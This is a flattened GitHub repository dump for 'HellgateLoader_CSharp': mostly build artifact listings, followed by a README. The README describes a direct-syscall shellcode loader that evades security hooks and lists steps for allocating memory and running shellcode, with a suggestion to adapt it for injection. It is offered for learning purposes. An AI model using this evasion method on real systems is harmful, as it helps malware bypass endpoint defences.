C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\Release\HellgateLoader.csprojAssemblyReference.cache 5 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\Release\HellgateLoader.csproj.CoreCompileInputs.cache 6 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\Release\HellgateLoader.exe 7 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\Release\HellgateLoader.pdb 8 | -------------------------------------------------------------------------------- /HellgateLoader/obj/Release/HellgateLoader.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/Release/HellgateLoader.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /HellgateLoader/obj/Release/HellgateLoader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/Release/HellgateLoader.exe -------------------------------------------------------------------------------- /HellgateLoader/obj/Release/HellgateLoader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/Release/HellgateLoader.pdb -------------------------------------------------------------------------------- /HellgateLoader/obj/x64/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /HellgateLoader/obj/x64/Debug/.NETFramework,Version=v4.8.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName = ".NET Framework 4.8")] 5 | -------------------------------------------------------------------------------- /HellgateLoader/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/x64/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /HellgateLoader/obj/x64/Debug/HellgateLoader.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 320b2bfc98e710625a6505a92bb56ca788d773e4 2 | -------------------------------------------------------------------------------- /HellgateLoader/obj/x64/Debug/HellgateLoader.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\x64\Debug\HellgateLoader.exe.config 2 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\x64\Debug\HellgateLoader.exe 3 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\x64\Debug\HellgateLoader.pdb 4 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\x64\Debug\HellgateLoader.csproj.CoreCompileInputs.cache 5 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\x64\Debug\HellgateLoader.exe 6 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\x64\Debug\HellgateLoader.pdb 7 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\x64\Debug\HellgateLoader.csprojAssemblyReference.cache 8 | -------------------------------------------------------------------------------- /HellgateLoader/obj/x64/Debug/HellgateLoader.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/x64/Debug/HellgateLoader.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /HellgateLoader/obj/x64/Debug/HellgateLoader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/x64/Debug/HellgateLoader.exe -------------------------------------------------------------------------------- /HellgateLoader/obj/x64/Debug/HellgateLoader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/x64/Debug/HellgateLoader.pdb -------------------------------------------------------------------------------- /HellgateLoader/obj/x64/Release/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /HellgateLoader/obj/x64/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName = ".NET Framework 4.8")] 5 | -------------------------------------------------------------------------------- /HellgateLoader/obj/x64/Release/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/x64/Release/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /HellgateLoader/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /HellgateLoader/obj/x64/Release/HellgateLoader.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 8c9075bf79e720afd6486469a7fc7983552b580a 2 | -------------------------------------------------------------------------------- /HellgateLoader/obj/x64/Release/HellgateLoader.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\x64\Release\HellgateLoader.exe.config 2 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\x64\Release\HellgateLoader.exe 3 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\x64\Release\HellgateLoader.pdb 4 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\x64\Release\HellgateLoader.csproj.CoreCompileInputs.cache 5 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\x64\Release\HellgateLoader.exe 6 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\x64\Release\HellgateLoader.pdb 7 | -------------------------------------------------------------------------------- /HellgateLoader/obj/x64/Release/HellgateLoader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/x64/Release/HellgateLoader.exe -------------------------------------------------------------------------------- /HellgateLoader/obj/x64/Release/HellgateLoader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/x64/Release/HellgateLoader.pdb -------------------------------------------------------------------------------- /HellgateLoader/obj/x86/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /HellgateLoader/obj/x86/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/x86/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /HellgateLoader/obj/x86/Debug/HellgateLoader.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | d0eb5e7239b356d3725c576d95eb56276dcf4545 2 | -------------------------------------------------------------------------------- /HellgateLoader/obj/x86/Debug/HellgateLoader.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\x86\Debug\HellgateLoader.exe.config 2 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\x86\Debug\HellgateLoader.exe 3 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\x86\Debug\HellgateLoader.pdb 4 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\x86\Debug\HellgateLoader.csprojAssemblyReference.cache 5 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\x86\Debug\HellgateLoader.csproj.CoreCompileInputs.cache 6 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\x86\Debug\HellgateLoader.exe 7 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\x86\Debug\HellgateLoader.pdb 8 | -------------------------------------------------------------------------------- /HellgateLoader/obj/x86/Debug/HellgateLoader.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/x86/Debug/HellgateLoader.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /HellgateLoader/obj/x86/Debug/HellgateLoader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/x86/Debug/HellgateLoader.exe -------------------------------------------------------------------------------- /HellgateLoader/obj/x86/Debug/HellgateLoader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/x86/Debug/HellgateLoader.pdb -------------------------------------------------------------------------------- /HellgateLoader/obj/x86/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName = ".NET Framework 4.8")] 5 | -------------------------------------------------------------------------------- /HellgateLoader/obj/x86/Release/HellgateLoader.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 2544c7f603d7994c13d7646b7a4e3075812a4f11 2 | -------------------------------------------------------------------------------- /HellgateLoader/obj/x86/Release/HellgateLoader.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\x86\Release\HellgateLoader.exe.config 2 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\x86\Release\HellgateLoader.exe 3 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\bin\x86\Release\HellgateLoader.pdb 4 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\x86\Release\HellgateLoader.csprojAssemblyReference.cache 5 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\x86\Release\HellgateLoader.csproj.CoreCompileInputs.cache 6 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\x86\Release\HellgateLoader.exe 7 | C:\Project\Projects\Project_HellgateLoader\HellgateLoader\HellgateLoader\obj\x86\Release\HellgateLoader.pdb 8 | -------------------------------------------------------------------------------- /HellgateLoader/obj/x86/Release/HellgateLoader.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/x86/Release/HellgateLoader.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /HellgateLoader/obj/x86/Release/HellgateLoader.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/x86/Release/HellgateLoader.exe -------------------------------------------------------------------------------- /HellgateLoader/obj/x86/Release/HellgateLoader.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/HellgateLoader_CSharp/b6f6dd33f8dc1de070dccc9b44688088bb23fec4/HellgateLoader/obj/x86/Release/HellgateLoader.pdb -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # HellgateLoader_CSharp 2 | 3 | Blog link: working on it 4 | - Rewrite hellgate with .net framework for learning purpose 5 | - Base on the original Hellgate project down below: 6 | 1. https://github.com/am0nsec/SharpHellsGate 7 | 2. https://github.com/am0nsec/HellsGate 8 | - And my other project down below: 9 | 1. [SysCall_ShellcodeLoader](https://github.com/Kara-4search/SysCall_ShellcodeLoad_Csharp) 10 | 2. [HookDetection](https://github.com/Kara-4search/HookDetection_CSharp) 11 | 3. [DInvoke_ShellcodeLoader](https://github.com/Kara-4search/DInvoke_shellcodeload_CSharp) 12 | 4. [NewNtdllBypassInlineHook](https://github.com/Kara-4search/NewNtdllBypassInlineHook_CSharp) 13 | 14 | - **I make this project for learning purpose, use it at you own risk.** 15 | - Only tested it on Win10/x64 works fine. 16 | - For better understanding, you really need to read the PDF(https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf) from the original author. 17 | - Thanks to them I do learn a lot, during coding this project. 18 | - Also, there is a little different here, Instead of read the syscall id from the memory, I read 24 bytes as the syscall, 19 | so you don‘t need to concat them again. I think that would be more convenient for me. 20 | - (From the PDF)This general usage code base self-resolves syscalls without the need for static elements. Additionally, this general usage code base makes zero function invocations to aggregate the syscalls themselves. 21 | - About how it works: 22 | 1. Read the ntdll.dll via IO.stream from disk as MemoryStream. 23 | 2. Find the RVA of function address. 24 | 3. Convert the rva to file offset(RVA - IMAGE_SECTION_HEADER_instance.VirtualAddress + IMAGE_SECTION_HEADER_instance.PointerToRawData;). 25 | 4. Use the offset to find to function offset in MemoryStream. 26 | 5. Read 24 bytes as syscall from MemoryStream with the right offset. 27 | 6. Execute the syscall via delegate. 28 | - The picture down below helps you to understand file offset. 29 | ![avatar](https://github.com/Kara-4search/ProjectPics/blob/main/HellGateLoader_ConvertRVAtoFO.jpg) 30 | - The code from the original project is elegant as hell, guess that is why is called HELLGATE :) :) ~ 31 | - You could even modify the code to like injection or something else. 32 | 33 | ## Usage 34 | 1. Set the APIs name that you need in "SyscallTable.cs" ,In this case is: 35 | * v1.Name = "NtAllocateVirtualMemory"; 36 | * v2.Name = "NtCreateThreadEx"; 37 | * v3.Name = "NtWaitForSingleObject"; 38 | ![avatar](https://raw.githubusercontent.com/Kara-4search/ProjectPics/main/HellGateLoader_APIs.png) 39 | 40 | 2. Set the shellcode in Program.cs, the default shellcode is a Calc. 41 | ![avatar](https://raw.githubusercontent.com/Kara-4search/ProjectPics/main/HellGateLoader_shellcode.png) 42 | 43 | 44 | ## TO-DO list 45 | - Works on both x64/x86 46 | - Restructure the code 47 | 48 | ## Update history 49 | - Fix bugs: cannot run normally after compile as release - 20211204 50 | * JIT function address is different bitween DEBUG and RELEASE 51 | * More details check the code in https://github.com/Kara-4search/JIT_DEMO_Csharp 52 | - Fix bugs: pMethod's address print with wrong format - 20220121 53 | 54 | 55 | ## Reference link: 56 | 1. https://github.com/am0nsec/HellsGate 57 | 2. https://github.com/am0nsec/SharpHellsGate 58 | 3. https://vxug.fakedoma.in/papers/VXUG/Exclusive/HellsGate.pdf  59 | 4. https://docs.microsoft.com/zh-cn/dotnet/api/system.reflection.bindingflags?view=net-5.0 60 | 5. https://docs.microsoft.com/zh-cn/dotnet/api/system.runtime.compilerservices.runtimehelpers.preparemethod?view=net-5.0 61 | 6. https://docs.microsoft.com/zh-cn/dotnet/api/system.runtime.compilerservices.runtimehelpers.preparemethod?redirectedfrom=MSDN&view=net-5.0#System_Runtime_CompilerServices_RuntimeHelpers_PrepareMethod_System_RuntimeMethodHandle_System_RuntimeTypeHandle___ 62 | 7. https://docs.microsoft.com/zh-cn/dotnet/api/system.runtime.interopservices.marshal.allochglobal?view=net-5.0 63 | 8. https://www.cnblogs.com/qintangtao/archive/2013/01/11/2857180.html 64 | 9. https://blog.csdn.net/StriveScript/article/details/6279488 65 | 10. https://www.cnblogs.com/wyping/p/3643243.html 66 | 11. https://blog.csdn.net/e295166319/article/details/52702461 67 | 12. https://blog.csdn.net/qiqi5045/article/details/7736576 68 | 13. https://blog.csdn.net/tianxiayijia1998/article/details/50119435 69 | 14. https://www.runoob.com/csharp/csharp-generic.html 70 | 15. https://www.csharpcodi.com/csharp-examples/System.RuntimeMethodHandle.GetFunctionPointer()/ 71 | 16. https://cloud.tencent.com/developer/article/1015264 72 | 17. https://a1ex.online/2020/07/26/PE-to-LoadLibrary-md/ 73 | 18. https://www.displayfusion.com/Discussions/View/converting-c-data-types-to-c/?ID=38db6001-45e5-41a3-ab39-8004450204b3 --------------------------------------------------------------------------------